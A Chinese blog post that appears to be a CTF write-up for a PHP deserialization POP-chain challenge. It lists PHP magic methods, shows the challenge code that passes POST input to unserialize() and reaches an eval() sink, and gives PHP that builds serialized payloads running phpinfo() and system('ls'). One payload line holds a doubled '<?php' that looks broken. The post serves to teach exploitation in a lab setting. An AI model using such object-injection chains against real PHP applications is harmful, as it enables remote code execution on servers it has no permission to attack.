[WEB]pop链

已于 2022-04-17 21:41:08 修改
阅读量599 收藏
点赞数
分类专栏: 刷题记录 文章标签: ctf
于 2022-04-17 21:40:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/124235294
版权

文章目录


学长给的一道题

魔法方法

__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数,session反序列化同样会调用
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval("#". $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

小技巧

f1=['a',get_flag]
($this->f1)()
['a',get_flag]()

如果f1是数组,那么在执行($this->f1)()时,就会执行a类的get_flag方法

分析

我们看这道题,既然是$_POST[‘cmd’],那么入口点是__destruct,__destruct里面有个echo,可以触发__tostring,__tostring有个run(),run()里有个($this->m1)(),可以把它写成数组的形式,再次调用mix里面的get_flag

$ser=new fin(new what(new mix([new mix('?><?php phpinfo();'),'get_flag'])));
echo urlencode(serialize($ser));

$ser = new fin(new what(new fin([new mix('?><?php system("ls");?>'), 'get_flag'])));
echo urlencode(serialize($ser));
  • 我们要在所有需要的类创建函数
  • 看get_flag类有个注释
    在这里插入图片描述
    这里要注意,echo()默认echo(<? php),那么我们传入$this->m1时,直接就被注释掉了,因此要?>闭合,再重新添加头文件
<?php

class crow
{
    public $v1;
    public $v2;

    public function __construct($v1)
    {
        $this->v1 = $v1;
    }



    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;
    public function __construct($f1)
    {
        $this->f1 = $f1;
    }

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }
}

class what
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
    }

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function __construct($m1)
    {
        $this->m1 = $m1;
    }

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval("#" . $this->m1);
    }
}

$ser=new fin(new what(new mix([new mix('?><?php phpinfo();'),'get_flag'])));
echo (serialize($ser));

在这里插入图片描述
这个时候执行命令

$ser=new fin(new what(new mix([new mix('?><?php <?php system("ls");?>'),'get_flag'])));
echo urlencode(serialize($ser));
pipasound
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Laravel8反序列化POP分析挖掘 .pdf
09-05
本文将深入探讨Laravel 8反序列化POP(Payload On Purpose的分析与挖掘。 首先,我们需要了解什么是反序列化。反序列化是将之前通过序列化保存的数据结构恢复为原来的对象或数据的过程。在这个过程中,如果设计...
WEB攻防-通用漏洞&PHP反序列化&POP构造&魔术方法&原生类
m0_65336233的博客
10-18 313
WEB攻防-通用漏洞&PHP反序列化&POP构造&魔术方法&原生类
php中的pop构造
blackguest07的博客
03-02 1324
php中反序列化漏洞的原理,pop的构造。
php反序列化学习(中)--pop的构造
最新发布
qq_75120258的博客
04-24 793
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 1928
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
POP实例解析学习
bin789456的博客
11-28 7912
写在前面 POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 基本魔法方法 我用的代码如下: <?php class A{ public $a="hi"; public $b="no"; function __construct() {
php反序列化之pop构造
weixin_72667582的博客
07-12 295
原题如下。
PHP之序列化与反序列化(POP篇)
errorr0
03-11 5094
序列化与反序列化的进阶
web前端面试题.doc
07-02
Web前端面试题涵盖了许多核心概念和技术,以下是这些题目所涉及的知识点详解: 1. 前端页面的三层构成:结构层(HTML)、表现层(CSS)和行为层(JavaScript)。结构层负责内容的组织,表现层处理外观设计,行为层...
web复习资料
11-29
Web复习资料 一、网络基础知识 1. Internet:Internet 是一个开放的、由位于世界不同地方的众多网络和计算机互联而成、依靠TCP/IP 协议实现通信的互联网络。 2. WebWeb 是分布在全世界的、基于 HTTP 通信协议的...
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP1
08-03
首先泄露目标的WEB目录,然后通过反序列化触发PDO连接,读取数据库配置文件,再利用这些配置触发第二次反序列化并执行SQL注入。 为了防止此类攻击,开发者应升级ThinkPHP至不受影响的版本,同时对序列化和反序列化...
Web编程技术1
01-20
数据路层:以太网协议 WiFi协议 PPP 物理层:以太网线缆 光纤 modems ISO七层协议 应用层又分为:会话层 表述层 应用层 IP(Internet Protocol)网际协议 IPV4 IPV6 由32位二进制地址组成 TCP(Transfer Control ...
POP入门
cxiaodi的博客
06-11 181
【代码】POP入门。
反序列化学习——pop的构造
m0_73756016的博客
03-10 513
在反序列化中,我们能控制的数据就是对象中的属性值(成员变量所以在PHP反序列化中有一种漏洞利用方法叫"面向属性编程"POP( Property Oriented Programming).Poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。然后让benben = fast这个类将其反序列化的时候顺理成章调用wakeup。所以要触发wakeup() 必须要反序列化fast这个类。魔术方法触发前提:魔术方法所在类(或对象)被调用。这里如果benben的值为反序列化类sec的结果。
PHP反序列化pop的构造
Elite的博客
03-28 823
简单易懂的反序列化pop构造
CTFWEB题中的POP
dangejinghong的博客
09-03 381
当这个php代码开始走的时候,先是__destruct()魔术方法被触发,然后echo出句子,当进行到。发现它调用了一个make_friends方法,但是这个方法不存在,所以触发call()魔术方法,在。__set_state(),调用var_export()导出类时,此静态方法会被调用。那么我们继续走,当进行isset()魔术方法时,echo出它的句子,然后发现其。__isset(),当对不可访问属性调用isset()或empty()时调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
POP的构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4308
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
利用Java编写web浏览器,给出具体代码,需要具备访问接,另存为,退出,后退,前进,全屏,查看源代码,刷新功能
06-08
以下是一个简单的JavaFX实现的Web浏览器的代码,包括访问接、另存为、退出、后退、前进、全屏、查看源代码、刷新功能。请注意,这只是一个简单的示例代码,实际的Web浏览器需要更复杂的功能和更完善的处理逻辑。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值